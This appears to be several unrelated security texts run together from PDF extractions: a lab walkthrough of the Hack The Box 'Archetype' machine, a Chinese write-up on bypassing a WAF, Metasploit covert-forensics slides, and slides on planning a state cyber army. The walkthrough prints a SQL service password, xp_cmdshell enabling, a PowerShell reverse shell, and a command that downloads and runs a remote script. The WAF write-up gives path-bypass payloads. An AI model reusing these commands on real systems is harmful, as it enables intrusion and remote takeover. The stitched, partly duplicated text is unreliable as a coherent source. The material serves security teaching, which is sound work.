ports=$(nmap -p- --min-rate=1000 -T4 10.10.10.27 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) nmap -sC -sV -p$ports 10.10.10.27 //-sC //-sV ​ ​ hack the box——-Archetype 0x00 0x01 ​ <DTSConfiguration> <DTSConfigurationHeading> <DTSConfigurationFileInfo GeneratedBy="..." GeneratedFromPackageName="..." GeneratedFromPackageID="..." GeneratedDate="20.1.2019 10:01:34"/> </DTSConfigurationHeading> <Configuration ConfiguredType="Property" Path="\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String"> <ConfiguredValue>Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue </Configuration> </DTSConfiguration> Data Source=.;Password=M3g4c0rp123;User ID=ARCHETYPE\sql_svc;Initial ​ select is_srvrolemember('sysadmin'); //is_srvrolemember EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" 0x02 mssql 0x03 $client = New-Object System.Net.Sockets.TCPClient("10.10.14.3",443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data python3 -m http.server 80 nc -lvnp 443 ufw allow from 10.10.10.27 proto tcp to any port 80,443 //80443 xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.163/shell.ps1\");" //ps type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt ​ ​ cd \Users\Administrator\Desktop type root.txt 0x04
pdf
1 OLONLWNW-记次绕waf ⼀、前⾔ ⼆、第⼀次⻅这样的waf 三、⼲翻waf 做项⽬遇到,感觉有点意思记录⼀下。 打开这个站的时候就注意到了这个站⽤了之前我审过的⼀个框架具体是哪个就不说了。 本来想着直接打就⾏了结果有点意思。 java的框架存在两处权限绕过 第⼀处 第⼆处 我本着直接打完交洞的想法使⽤第⼆种权限绕过⽅式没想到看到了如下界⾯ ⼀、前⾔ ⼆、第⼀次⻅这样的waf Plain Text 复制代码 Plain Text 复制代码 /xxx/../api/user 1 /api/user;1.js 1 2 我⼲了啥就拦我了,第⼀次⻅拦我分号。之前阿⾥云waf也不这么拦我啊 /api/user;?upload=file 拦截 试试..呢 /xxx/../api/user 拦截 三、⼲翻waf 3 /xxx/..;/api/use 拦截 各种编码、参数污染、垃圾数据包都被拦了 4 看来不能从这些⽅⾯下⼿,还是回到分号和..上 /xxx/api/user; 拦截 /xxx/api/user?; 不拦 5 但是这样不能使⽤;1.js绕,因为getRequestURI()是获取不到问号后⾯的那把问号编码呢 /xxx/api/user%3f; 但是这样就匹配不到我原来的路由也没⽤。然后我⼜测试了 /xxx/%3f/../../api/user 被拦 此时想到再⽤..; 因为之前测阿⾥云waf的时候发现../拦截..;/不拦截 那么这个waf可能是拦截../和; 分号可以⽤问号编码绕过然后我再插⼊分号不就绕过了 /xxx/%3f/..;/..;/api/user 接下来就可以正常上传了 然后上传jsp⼜遇到waf了,⽤⼀个双引号和java unicode特性绕了 6
pdf
Covert Post-Exploitation Forensics with Metasploit Wesley McGrew McGrewSecurity.com Mississippi State University National Forensics Training Center From the DEF CON 19 CFP: Okay, let’s get sneaky... Covert • without the subject’s knowledge Post-Exploitation • after a remote compromise, local backdoor Forensics • reconstructing data above and beyond what the subject anticipates Forensics and penetration testing/ other offensive operations For the forensics geeks... ? No subject location, no problem Surreptitious acquisition and analysis Familiar tools... For the penetration testing geeks... Potential for more important data gathered per compromised system “We don’t keep that data” Multiple revisions of files, old data Data carving General purpose scripting Stealthy! Typical Forensics Examination Scenarios • Hardware seizure • Authorized software agents • On-site • “Suspect”/Subject is aware Covert Remote Forensics • Unaware Subject • No known physical location? • Not a deal-killer. • Remote imaging • Remote block device access Ears perking up yet? • Intelligence • Penetration testers upping post- exploitation game • Compliance • Criminal Forensics for people who break things Semester-long class Week-long LE Courses Talk to Pent este rs File System Forensic Capabilities • Allocated files • Deleted files • Slack space • Disk/Volume • Unallocated space • Deletion vs. Formatting vs. Wiping • Imaging Slack Space Example Sector size: 512 bytes Cluster size: 4 sectors File size: 4150 bytes RAM Slack (probably 0’d) Disk Slack (potential goodies) Can’t I do this already? • Load sleuth kit up onto the compromised target? • Probably will work but... • ...stomping on deleted files • ...not that stealthy • ...a little less slick than what I’m proposing: Enter Railgun • “Patrick HVE” - Are you out there? Massive thanks! If we can call Windows API remotely... • ...then we can access physical/logical block devices directly • ...which means we can read arbitrary sectors from the disk • ...why not map remote block devices to local ones? Metasploit Post Modules • enum_drives.rb • Helper/Support • imager.rb • byte-for-byte imaging • Hashing • Split images • Cool, but.......... nbd_server.rb! • Run forensic tools locally, on local block devices that are mapped to remote block devices! • API calls made over meterpreter shell • NBD (Network Block Device) • Easy way to get programmatic block devices in Linux • Read-only (forensic write-blocking) • Direct remote access with off-the-shelf/ commercial/open-source tools Attacker Target Meterpreter Win API Disk Metasploit nbd /dev/nbd0 Forensic Tools Stupid Protocol Tricks Disk Windows API Meterpreter/Railgun NBD iSCSI Caveats and exercises for the reader • Network • Speed • Stealth • Cleaner/cross-platform implementation • Pure ruby iSCSI? Conclusions • Go and wring more data out of systems! • Builds capability for forensic examiners and penetration testers • Encourage secure wiping Demos
pdf
Kim Jong Kim Jong--il and me: il and me: How to build a cyber army to attack the How to build a cyber army to attack the U.S. U.S. Charlie Miller Charlie Miller Independent Security Evaluators Independent Security Evaluators cmiller@securityevaluators.com cmiller@securityevaluators.com Overview Overview About me About me Some background material Some background material Key strategies Key strategies Cyberwar potential attacks Cyberwar potential attacks Cyberarmy tasks Cyberarmy tasks Possible defenses Possible defenses Layout of army Layout of army Timeline of preparation and attack Timeline of preparation and attack Conclusions and lessons learned Conclusions and lessons learned About this talk About this talk Originally given at Conference for Cyber Conflict, at Originally given at Conference for Cyber Conflict, at the NATO Cooperative Cyber Defense Centre of the NATO Cooperative Cyber Defense Centre of Excellence Excellence The audience was some technical, some policy types The audience was some technical, some policy types This version is a little more technical (and hopefully This version is a little more technical (and hopefully funny) funny) Who I am Who I am PhD in Mathematics, University of Notre Dame PhD in Mathematics, University of Notre Dame 1 year, Security Architect, a Financial Services firm 1 year, Security Architect, a Financial Services firm 5 years, NSA Global Network Exploitation Analyst 5 years, NSA Global Network Exploitation Analyst 4 years, consultant for Independent Security Evaluators 4 years, consultant for Independent Security Evaluators Application and network penetration testing Application and network penetration testing Project planning and scoping Project planning and scoping First remote exploits against iPhone, G1 Android phone First remote exploits against iPhone, G1 Android phone 3 time winner Pwn2Own competition 3 time winner Pwn2Own competition My career as a govie My career as a govie Bullets from my NSA approved resume Bullets from my NSA approved resume Computer Network Exploitation Computer Network Exploitation Performed computer network scanning and Performed computer network scanning and reconnaissance reconnaissance Executed numerous computer network exploitations Executed numerous computer network exploitations against foreign targets against foreign targets Network Intrusion Analysis Network Intrusion Analysis Designed and developed network intrusion detection tools Designed and developed network intrusion detection tools to find and stop exploitation of NIPRNET hosts, as well as to find and stop exploitation of NIPRNET hosts, as well as locate already compromised hosts locate already compromised hosts Why I gave this talk Why I gave this talk Those in charge of Those in charge of ““cyber cyber”” policy don policy don’’t understand t understand technical details technical details Sometimes the details matter Sometimes the details matter Clarke Clarke’’s s ““Cyberwar Cyberwar”” was clearly written by was clearly written by someone who knows nothing about the someone who knows nothing about the technological details technological details To help those capable of making decisions To help those capable of making decisions concerning cyberwar to discern fact from fiction concerning cyberwar to discern fact from fiction Basics Basics For comparison For comparison US Annual military spending: $708 Billion US Annual military spending: $708 Billion US Cyber Command: $105 Million US Cyber Command: $105 Million North Korea military spending: $5 Billion 
North Korea military spending: $5 Billion North Korean cyber warfare spending: $56 Million North Korean cyber warfare spending: $56 Million Iran cyber warfare spending: $76 Million Iran cyber warfare spending: $76 Million My hypothetical cyber army is a bargain at $49 My hypothetical cyber army is a bargain at $49 Million! Million! Aspects of Cyberwarfare Aspects of Cyberwarfare Collect intelligence Collect intelligence Control systems Control systems Deny or disable systems Deny or disable systems Cause harm on the level of Cause harm on the level of ““kinetic kinetic”” attacks attacks Some statistics Some statistics # IP addresses: ~3.7 bil # IP addresses: ~3.7 bil # personal computers: ~2 bil # personal computers: ~2 bil # iphones worldwide: ~41 mil # iphones worldwide: ~41 mil Botnets size: Botnets size: Zeus: 3.6 mil (.1% of personal computers) Zeus: 3.6 mil (.1% of personal computers) Koobface: 2.9 mil Koobface: 2.9 mil TidServ: 1.5 mil TidServ: 1.5 mil Conficker: 10 mil+ Conficker: 10 mil+ Botnet Botnet A distributed set of software programs which run A distributed set of software programs which run autonomously and automatically autonomously and automatically Group can be controlled to perform tasks Group can be controlled to perform tasks Individual software running on each system is called a Individual software running on each system is called a bot bot Remote access tool Remote access tool Abbreviated RAT Abbreviated RAT Program which allows remote control of a Program which allows remote control of a device/computer device/computer Allows attacker to search/monitor host, Allows attacker to search/monitor host, search/monitor local network, attack other hosts, etc search/monitor local network, attack other hosts, etc Should be hard to detect Should be hard to detect 00--day, the known unknowns day, the known unknowns A vulnerability or exploit that exists in software for A vulnerability or exploit that exists in software for which there is no available patch or fix which there is no available patch or fix Oftentimes, the existence of this exploit is unknown Oftentimes, the existence of this exploit is unknown by the community at large, even the vendor by the community at large, even the vendor Difficult to defend against the attack you don Difficult to defend against the attack you don’’t know t know about about 00--days exist days exist I found a bug in Samba in Aug 2005. Sold in Aug I found a bug in Samba in Aug 2005. Sold in Aug 2006, Fixed in May 2007 2006, Fixed in May 2007 Adobe JBIG2 vulnerability. Discovered in 2008, Sold Adobe JBIG2 vulnerability. Discovered in 2008, Sold in Jan 2009, Discussed in Feb 2009, Patch March in Jan 2009, Discussed in Feb 2009, Patch March 2009 2009 Found a bug preparing for Pwn2Own 2008. Used it in Found a bug preparing for Pwn2Own 2008. Used it in Pwn2Own 2009. Fixed 2 months later Pwn2Own 2009. Fixed 2 months later 00--day lifespan day lifespan Average lifespan of zero Average lifespan of zero--day bugs is 348 days day bugs is 348 days The shortest The shortest--lived bugs have been made public within lived bugs have been made public within 99 days 99 days The longest lifespan was 1080 days The longest lifespan was 1080 days nearly three years. nearly three years. 
From: Justine Aitel, CEO Immunity (from 2007) From: Justine Aitel, CEO Immunity (from 2007) 00--day detection day detection Possible but extremely difficult Possible but extremely difficult Tend to lead to false positives Tend to lead to false positives Can be circumvented if defenses are known Can be circumvented if defenses are known Overall Strategies Overall Strategies Dominate cyberspace Dominate cyberspace Infiltrate key systems in advance Infiltrate key systems in advance Rely on research and intelligence Rely on research and intelligence gathering gathering Use known exploits when possible, Use known exploits when possible, 00--days when necessary days when necessary Hack the Planet Hack the Planet ““Dominate cyberspace Dominate cyberspace””, i.e. control as many devices , i.e. control as many devices around the world as possible around the world as possible In a cyberwar, portions of the Internet will be degraded. In a cyberwar, portions of the Internet will be degraded. Controlling lots of devices increases ability to still act Controlling lots of devices increases ability to still act Makes attribution easier for your side, harder for Makes attribution easier for your side, harder for opponent opponent Sometimes you find yourself inside hard targets by luck Sometimes you find yourself inside hard targets by luck Many basic attacks work by using many hosts and are Many basic attacks work by using many hosts and are more effective with more hosts more effective with more hosts Advance Planning Advance Planning Attacking well secured networks requires research Attacking well secured networks requires research and planning, it cannot be done overnight and planning, it cannot be done overnight Many offensive capabilities (communication, Many offensive capabilities (communication, scanning, etc) are easily detected if performed scanning, etc) are easily detected if performed quickly, not if performed slowly quickly, not if performed slowly Can be prepared to disable/destroy key systems Can be prepared to disable/destroy key systems when needed when needed Research and Intelligence Research and Intelligence How are key financial and SCADA systems and How are key financial and SCADA systems and networks constructed? networks constructed? What hardware/software do core Internet routers, What hardware/software do core Internet routers, DNS servers utilize? DNS servers utilize? What defenses and monitoring systems are in place? What defenses and monitoring systems are in place? To 0 To 0--day or not day or not Sometimes, especially during early stages, it makes Sometimes, especially during early stages, it makes sense to look like an average attacker sense to look like an average attacker Use known vulnerabilities, known tools Use known vulnerabilities, known tools Harder to attribute to military Harder to attribute to military inexpensive if caught inexpensive if caught 00--day exploits and custom tools are harder to detect, day exploits and custom tools are harder to detect, but if found, are expensive and time consuming to but if found, are expensive and time consuming to replace replace Other strategies to consider Other strategies to consider Clarke Clarke’’s logic bombs s logic bombs Stealing from/paying cyber criminals for access Stealing from/paying cyber criminals for access Insider backdoors, i.e. employees at MS, Cisco, etc Insider backdoors, i.e. 
employees at MS, Cisco, etc Potential Cyberwar Attacks Potential Cyberwar Attacks Potential Cyberwar Attacks Potential Cyberwar Attacks Shut down the Internet Shut down the Internet Take financial markets offline, corrupt or destroy Take financial markets offline, corrupt or destroy financial data financial data Disrupt shipping, air transportation Disrupt shipping, air transportation Blackouts Blackouts Disable communication within military Disable communication within military Disable cell phone networks Disable cell phone networks Cyberarmy tasks Cyberarmy tasks Cyberarmy tasks Cyberarmy tasks Communication redundancy Communication redundancy Distributed Denial of Service Distributed Denial of Service Hard targets Hard targets Core infrastructure Core infrastructure Attacking air gapped networks Attacking air gapped networks Communication Communication redundancy redundancy Operators will be geographically distributed Operators will be geographically distributed Offices throughout the world Offices throughout the world Multiple offices in target country Multiple offices in target country Direct, redundant communication possible to command Direct, redundant communication possible to command Modems over phone lines, satellite phones Modems over phone lines, satellite phones Even without the Internet, attacks against the Even without the Internet, attacks against the Internet can be commanded and controlled Internet can be commanded and controlled DDOS DDOS Flood target with too much traffic Flood target with too much traffic Deny DNS, bandwidth to server, server(s) themselves Deny DNS, bandwidth to server, server(s) themselves Need to control (and coordinate) a large number of Need to control (and coordinate) a large number of hosts to perform this attack hosts to perform this attack BTW, North Korea functions just fine if the Internet BTW, North Korea functions just fine if the Internet goes away goes away Collecting hosts Collecting hosts Assume ownership of existing botnets Assume ownership of existing botnets Use client side vulnerabilities Use client side vulnerabilities Browsers, Flash, Reader, Java, etc Browsers, Flash, Reader, Java, etc Make some effort to clean up existing malware, patch Make some effort to clean up existing malware, patch systems systems Other botnet masters may try to take your bots Other botnet masters may try to take your bots Use only known vulnerabilities Use only known vulnerabilities Don Don’’t waste the 0 t waste the 0--days, unless you have extras days, unless you have extras The N. Korean Botnets The N. 
Korean Botnets Want to avoid Want to avoid ““string which unravels all string which unravels all”” Develop a large number of different varieties of bot Develop a large number of different varieties of bot software software Avoid central control Avoid central control Bots should be geographically diverse Bots should be geographically diverse Saturated in target country Saturated in target country Regionally diverse in target country Regionally diverse in target country at least 100x bigger than largest botnet seen at least 100x bigger than largest botnet seen Multiple botnets with Multiple botnets with diversity diversity Hard Targets Hard Targets ““Hard Hard”” targets targets Large corporations Large corporations Banking and Financial Services Banking and Financial Services Air traffic controls Air traffic controls NIPRNET NIPRNET Employ multiple security mechanisms, many distinct security Employ multiple security mechanisms, many distinct security regions in network, dedicated security teams regions in network, dedicated security teams Botnet size figures suggest there are no Botnet size figures suggest there are no ““hard hard”” targets! targets! Attacking Hard Targets Attacking Hard Targets Need a dedicated, patient attack. Pentesting 101 Need a dedicated, patient attack. Pentesting 101 Step 1: get a foothold Step 1: get a foothold Research target network and users Research target network and users Can track victims with GSM information (SOURCE Boston Can track victims with GSM information (SOURCE Boston talk) talk) Examine social networks of users Examine social networks of users Get inside help, infiltrate or buy access Get inside help, infiltrate or buy access Send targets emails with malware/links to 0 Send targets emails with malware/links to 0--day exploits day exploits Maybe you already control some trusted nodes via the botnet Maybe you already control some trusted nodes via the botnet More Hard Targets More Hard Targets Spread Spread Record keystrokes, sniff packets, map network, analyze intranet Record keystrokes, sniff packets, map network, analyze intranet services services Slowly take over the entire local network Slowly take over the entire local network Learn how they make changes, what intranet sites they use, Learn how they make changes, what intranet sites they use, monitor emails, crack all passwords monitor emails, crack all passwords Use client side attacks, observe VPN, SSH usage Use client side attacks, observe VPN, SSH usage Install RATs on systems, different RATs for different hard Install RATs on systems, different RATs for different hard targets targets Become so Become so--called called ““Advanced Persistent Threat Advanced Persistent Threat”” Core Infrastructure Core Infrastructure Targets: Core routers, DNS servers Targets: Core routers, DNS servers Attacks Attacks DDOS DDOS Poisoning routing tables Poisoning routing tables Gain access via Gain access via ““hard target hard target”” approach approach DOS attacks against vulnerabilities in routers, DOS attacks against vulnerabilities in routers, servers servers Cisco IOS, JunOS, BIND, MS DNS Cisco IOS, JunOS, BIND, MS DNS Air gapped systems Air gapped systems The most secure systems are The most secure systems are ““air gapped air gapped”” from the from the Internet (or at least are supposed to be) Internet (or at least are supposed to be) DOD TS//SI network DOD TS//SI network Electric power grid Electric power grid Air traffic control? Air traffic control? 
These can still be remotely attacked, but difficult These can still be remotely attacked, but difficult JWICS was compromised by USB JWICS was compromised by USB Un Un--airgapping airgapping The easiest solution is to put these networks back on the The easiest solution is to put these networks back on the Internet Internet Have an operative stick a 3g modem and a RAT on a Have an operative stick a 3g modem and a RAT on a computer/device on the network computer/device on the network ...or add a whole new device to network ...or add a whole new device to network Or a satellite phone Or a satellite phone Or a modem over existing phone lines Or a modem over existing phone lines if tempest shielding is a problem if tempest shielding is a problem Cyberwar defenses Cyberwar defenses Cyberwar Defenses Cyberwar Defenses Target country can take defensive actions during or in Target country can take defensive actions during or in advance to a cyber attack advance to a cyber attack Segregation (i.e. disconnect from the Internet) Segregation (i.e. disconnect from the Internet) Deploy large scale IDS/IPS systems Deploy large scale IDS/IPS systems Akami Akami--like DOS protection of critical systems like DOS protection of critical systems Airgap sensitive networks Airgap sensitive networks Segregation Segregation Target country can isolate itself from the Internet to Target country can isolate itself from the Internet to protect itself from foreign attack protect itself from foreign attack Country may install aggressive filters on foreign Country may install aggressive filters on foreign inbound traffic inbound traffic By positioning botnet hosts and making operations in By positioning botnet hosts and making operations in-- country, the attack can still occur country, the attack can still occur Filtering Filtering Target country may use filtering on Internet traffic Target country may use filtering on Internet traffic IDS, IPS, etc IDS, IPS, etc All botnet clients and their communications are custom All botnet clients and their communications are custom written, so no signatures will exist written, so no signatures will exist All RATs and their communications are custom written, All RATs and their communications are custom written, so no signatures will exist so no signatures will exist Redundancy of bots and RATS ensure if one is Redundancy of bots and RATS ensure if one is detected, attack can continue from remaining ones detected, attack can continue from remaining ones Akami Akami--like defenses like defenses Akami works by mirroring and caching content in multiple, Akami works by mirroring and caching content in multiple, physically diverse locations physically diverse locations Akami delivers content close to the requester Akami delivers content close to the requester Target may use Akami itself, or develop similar approach to Target may use Akami itself, or develop similar approach to try to stop DDOS attack against critical infrastructure try to stop DDOS attack against critical infrastructure Our botnet is physically diverse so will have many nodes Our botnet is physically diverse so will have many nodes close to each Akami server close to each Akami server Our botnet should be large enough to overwhelm even Our botnet should be large enough to overwhelm even distributed service distributed service Airgapped systems Airgapped systems Target country may physically separate critical Target country may physically separate critical infrastructure (utilities, financial networks, military 
infrastructure (utilities, financial networks, military systems) systems) Some systems cannot be airgapped (e Some systems cannot be airgapped (e--commerce) commerce) In advance, we try to un In advance, we try to un--airgap the systems we target airgap the systems we target The Cyberarmy The Cyberarmy Job roles Job roles Numbers and cost per role Numbers and cost per role Equipment Equipment Total cost Total cost Job roles Job roles Vulnerability Analysts Vulnerability Analysts Exploit developers Exploit developers Bot collectors Bot collectors Bot maintainers Bot maintainers Operators Operators Remote personnel Remote personnel Developers Developers Testers Testers Technical consultants Technical consultants Sysadmins Sysadmins Managers Managers Vulnerability analysts Vulnerability analysts Bug hunters, find vulnerabilities in software via fuzzing and st Bug hunters, find vulnerabilities in software via fuzzing and static atic analysis analysis Need to be world class, hard to Need to be world class, hard to ““grow grow”” this talent this talent Try to hire up all the best people Try to hire up all the best people Find bugs in client side applications (browsers) as well as Find bugs in client side applications (browsers) as well as servers (DNS, HTTP) and networking equipment, smart phones servers (DNS, HTTP) and networking equipment, smart phones Find bugs in kernels for sandbox escape and privilege escalation Find bugs in kernels for sandbox escape and privilege escalation As needed, exploitable or DOS bugs As needed, exploitable or DOS bugs Exploit developers Exploit developers Turn vulnerabilities into highly reliable exploits Turn vulnerabilities into highly reliable exploits For both 0 For both 0--day and known vulnerabilities day and known vulnerabilities This used to be easy, but now takes a tremendous This used to be easy, but now takes a tremendous amount of skill amount of skill Will need to be able to write exploits for various Will need to be able to write exploits for various platforms: Windows, Mac OS X, Linux platforms: Windows, Mac OS X, Linux Will need to be able to defeat latest anti Will need to be able to defeat latest anti--exploitation exploitation measures, ALSR, DEP, sandboxing measures, ALSR, DEP, sandboxing Bot collectors Bot collectors Responsible for using client side exploits to take over Responsible for using client side exploits to take over and install bots on as many computers and devices and install bots on as many computers and devices as possible as possible Mostly use exploits based on known exploits, some 0 Mostly use exploits based on known exploits, some 0-- day usage day usage Deliver exploits via spam, advertising banners, Deliver exploits via spam, advertising banners, malware malware Maintain and monitor exploit servers Maintain and monitor exploit servers Bot maintainers Bot maintainers Collection of bot machines will constantly be changing Collection of bot machines will constantly be changing Some will die, be reinstalled, etc Some will die, be reinstalled, etc Others will be added Others will be added Monitor size and health of botnets, as well as geographic Monitor size and health of botnets, as well as geographic diversity inside and outside target country diversity inside and outside target country Test botnets Test botnets Make efforts to maintain bots by keeping the systems on Make efforts to maintain bots by keeping the systems on which they reside patched, removing other malware, if which they reside patched, removing other malware, 
if possible possible Operators Operators Actively exploiting hard targets (elite pen testers) Actively exploiting hard targets (elite pen testers) Advanced usage of exploits, mostly 0 Advanced usage of exploits, mostly 0--day day Need to understand entire target network and be able Need to understand entire target network and be able to passively and actively scan and enumerate to passively and actively scan and enumerate network network Install RATs, monitor keystrokes and communications Install RATs, monitor keystrokes and communications to expand reach in network to expand reach in network Remote personnel Remote personnel Responsible for setting up operations around the Responsible for setting up operations around the world world Getting jobs, access to airgapped systems Getting jobs, access to airgapped systems Installing, monitoring, and testing un Installing, monitoring, and testing un--airgapping airgapping devices devices Developers Developers Need to develop a variety of bots with differing Need to develop a variety of bots with differing communication methods communication methods Need to develop a variety of RATs Need to develop a variety of RATs Develop tools to aid other personnel Develop tools to aid other personnel Requires user and kernel level development on a Requires user and kernel level development on a variety of platforms variety of platforms Testers Testers Test exploits, RATs, and bots for functionality, Test exploits, RATs, and bots for functionality, reliability reliability Run all tools/exploits against a variety of anti Run all tools/exploits against a variety of anti--virus, virus, IDS, IPS, to ensure stealth IDS, IPS, to ensure stealth Technical consultants Technical consultants These are experts in various domain specific and These are experts in various domain specific and obscure hardware and software systems obscure hardware and software systems SCADA engineers SCADA engineers Medical device experts Medical device experts Aviation scheduling experts Aviation scheduling experts etc etc Sysadmins Sysadmins Keep systems running, updated Keep systems running, updated Install software, clients and target software Install software, clients and target software Manage test networks and systems Manage test networks and systems Number and Cost per role Number and Cost per role Vulnerability Analysts Vulnerability Analysts Exploit developers Exploit developers Bot collectors Bot collectors Bot maintainers Bot maintainers Operators Operators Remote personnel Remote personnel Developers Developers Testers Testers Technical consultants Technical consultants Sysadmins Sysadmins Managers Managers Some info about costs Some info about costs I only factor in hardware, software, and personnel I only factor in hardware, software, and personnel salaries salaries I do not include I do not include Building rent, utilities, travel Building rent, utilities, travel support staff: Electricians, janitors, guards... support staff: Electricians, janitors, guards... 
““Spys Spys”” Intelligence analysts Intelligence analysts Health insurance, retirements, other benefits Health insurance, retirements, other benefits Some risk in this job Some risk in this job I pay slightly inflated salaries to compensate for this I pay slightly inflated salaries to compensate for this risk risk Could start many small companies (or contract out to Could start many small companies (or contract out to existing companies) such than no one group knew existing companies) such than no one group knew what was going on what was going on Plus this is better opsec, if all the sudden all known Plus this is better opsec, if all the sudden all known security researchers disappeared, people would get security researchers disappeared, people would get worried! worried! Vulnerability analysts Vulnerability analysts Level 1: 10 Level 1: 10 Well known, world class experts Well known, world class experts $250,000/yr $250,000/yr Level 2: 10 Level 2: 10 College level CS majors College level CS majors $40,000/yr $40,000/yr Total: $2,900,000 Total: $2,900,000 Exploit developers Exploit developers Level 1: 10 Level 1: 10 World class experts: devise generic ways to beat anti World class experts: devise generic ways to beat anti--exploitation, write exploits exploitation, write exploits $250k $250k Level 2: 40 Level 2: 40 Prolific Metasploit contributors: write exploits Prolific Metasploit contributors: write exploits $100k $100k Level 3: 20 Level 3: 20 College level CS majors College level CS majors $40k $40k Total: $7,300,000 Total: $7,300,000 Bot collectors Bot collectors Level 1: 50 Level 1: 50 BS or Masters in CS BS or Masters in CS $75k $75k Level 2: 10 Level 2: 10 College level CS majors College level CS majors $40k $40k Total: $4,150,000 Total: $4,150,000 Bot maintainers Bot maintainers Level 1: 200 Level 1: 200 BS in CS BS in CS $60k $60k Level 2: 20 Level 2: 20 CS majors CS majors $45k $45k Total: $12,900,000 Total: $12,900,000 Operators Operators Level 1: 50 Level 1: 50 Experienced, skilled penetration testers Experienced, skilled penetration testers $100k $100k Level 2: 10 Level 2: 10 CS Majors CS Majors $40k $40k Total: $5,400,000 Total: $5,400,000 Remote personnel Remote personnel Level 1: 10 Level 1: 10 Experienced spys Experienced spys Pay comes from spy agency Pay comes from spy agency Level 2: 10 Level 2: 10 CS Majors CS Majors $40k $40k Total: $400,000 Total: $400,000 Developers Developers Level 1: 10 Level 1: 10 Experienced Kernel developers Experienced Kernel developers $125k $125k Level 2: 20 Level 2: 20 BS in CS BS in CS $60k $60k Level 3: 10 Level 3: 10 CS Majors CS Majors $40k $40k Total: $2,850,000 Total: $2,850,000 Testers Testers Level 1: 10 Level 1: 10 BS in CS BS in CS $60k $60k Level 2: 5 Level 2: 5 CS Majors CS Majors $40k $40k Total: $800,000 Total: $800,000 Others Others Technical consultants Technical consultants 20 at 100k fee 20 at 100k fee $2mil $2mil Sysadmins Sysadmins 10 at 50k 10 at 50k $500,000 $500,000 Managers Managers 1 for every 10 people, 1 for every 10 mangers 1 for every 10 people, 1 for every 10 mangers 52 managers (@100k), 5 senior managers (@200k) 52 managers (@100k), 5 senior managers (@200k) $6.2mil $6.2mil Equipment Equipment Hardware Hardware Average of 2 computers per person Average of 2 computers per person Exploitation/Testing lab with 50 computers, variety of routers Exploitation/Testing lab with 50 computers, variety of routers and network equipment, smartphones, etc and network equipment, smartphones, etc Software Software MSDN 
subscription, IDA Pro, Hex Rays, Canvas, Core Impact, MSDN subscription, IDA Pro, Hex Rays, Canvas, Core Impact, 010 editor, Bin Navi, etc 010 editor, Bin Navi, etc Remote exploitation servers Remote exploitation servers Eh, we Eh, we’’ll just use some owned boxes ll just use some owned boxes The army The army 592 people 592 people $45.9 mil in annual salary $45.9 mil in annual salary Average annual salary $77,534 Average annual salary $77,534 $3 mil in equipment $3 mil in equipment Pie charts! Pie charts! Bot maintiners Bot maintiners Exploit dev Exploit dev Operators Operators A 2 year projection A 2 year projection First 3 months First 3 months Remote personnel set up stations Remote personnel set up stations Remote personnel try to get jobs in financial industry, Remote personnel try to get jobs in financial industry, airlines, and electrical/nuclear industries, join military airlines, and electrical/nuclear industries, join military Vulnerability analysts start looking for bugs Vulnerability analysts start looking for bugs Exploit developers write and polish (known) browser Exploit developers write and polish (known) browser exploits for bot collection exploits for bot collection Developers write bot software, RATS Developers write bot software, RATS Hard targets identified and researched Hard targets identified and researched Months 3 Months 3--66 A couple of exploitable 0 A couple of exploitable 0--days and some DOS bugs days and some DOS bugs are discovered are discovered Exploit developers begin writing 0 Exploit developers begin writing 0--day exploits day exploits Bot collection begins Bot collection begins Hard targets research continues, social networks Hard targets research continues, social networks joined, emails exchanged, joined, emails exchanged, ““trust trust”” established established Months 6 Months 6--99 With 0 With 0--days in hand, hard target beach heads are days in hand, hard target beach heads are established established Bot collection and clean Bot collection and clean--up continues up continues 500k hosts compromised (a small botnet by 500k hosts compromised (a small botnet by cybercriminal standards) cybercriminal standards) Remote stations operational, communication Remote stations operational, communication redundant redundant Developers writing additional bots and tools Developers writing additional bots and tools After 1 year After 1 year Control over some systems in hard targets Control over some systems in hard targets System of bots continues to grow System of bots continues to grow 5 million hosts (large botnet by cybercriminal 5 million hosts (large botnet by cybercriminal standards) standards) 00--day exploits available for many browser/OS day exploits available for many browser/OS combinations, some smartphones combinations, some smartphones Inside access to critical military, financial, and utilities Inside access to critical military, financial, and utilities achievied achievied 1 year 6 months 1 year 6 months Most hard targets thoroughly compromised Most hard targets thoroughly compromised It would be hard to ever lose control over these networks, It would be hard to ever lose control over these networks, even if detected even if detected System of bots continues to grow System of bots continues to grow 100 million hosts 100 million hosts 00--day exploits available for all browser/OS combinations, day exploits available for all browser/OS combinations, DOS conditions known for BIND, many Cisco IOS DOS conditions known for BIND, many Cisco IOS 
configurations configurations Control of many airgapped systems Control of many airgapped systems 2 years 2 years All hard targets thoroughly compromised All hard targets thoroughly compromised System of bots continues to grow System of bots continues to grow 500 million hosts (20% personal computers), many 500 million hosts (20% personal computers), many smart phones smart phones Airgapped and critical systems thoroughly controlled Airgapped and critical systems thoroughly controlled Attack! Attack! Financial data altered Financial data altered Military and government networks debilitated Military and government networks debilitated Utilities affected, blackouts ensue Utilities affected, blackouts ensue Ticket booking and air traffic control systems offline Ticket booking and air traffic control systems offline DOS launched against root DNS servers DOS launched against root DNS servers BGP routes altered BGP routes altered Phone system jammed with calls from owned smartphones Phone system jammed with calls from owned smartphones North Korea wins! North Korea wins! Conclusions Conclusions Lessons learned Lessons learned With some dedication, patience, and skilled attackers With some dedication, patience, and skilled attackers there is not much defense that is possible there is not much defense that is possible ItIt’’s an offensive game, although perhaps I s an offensive game, although perhaps I’’m biased m biased Its more about people than equipment (94% of my Its more about people than equipment (94% of my cost is for salaries) cost is for salaries) Taking down the target Taking down the target’’s Internet without taking down s Internet without taking down your own would be harder but possible (not a problem your own would be harder but possible (not a problem here) here) Lessons learned (cont) Lessons learned (cont) A lot of talk concerning software and hardware A lot of talk concerning software and hardware backdoors in the media backdoors in the media North Korea can North Korea can’’t easily do this, and this attack suffers t easily do this, and this attack suffers from being hard to carry out and 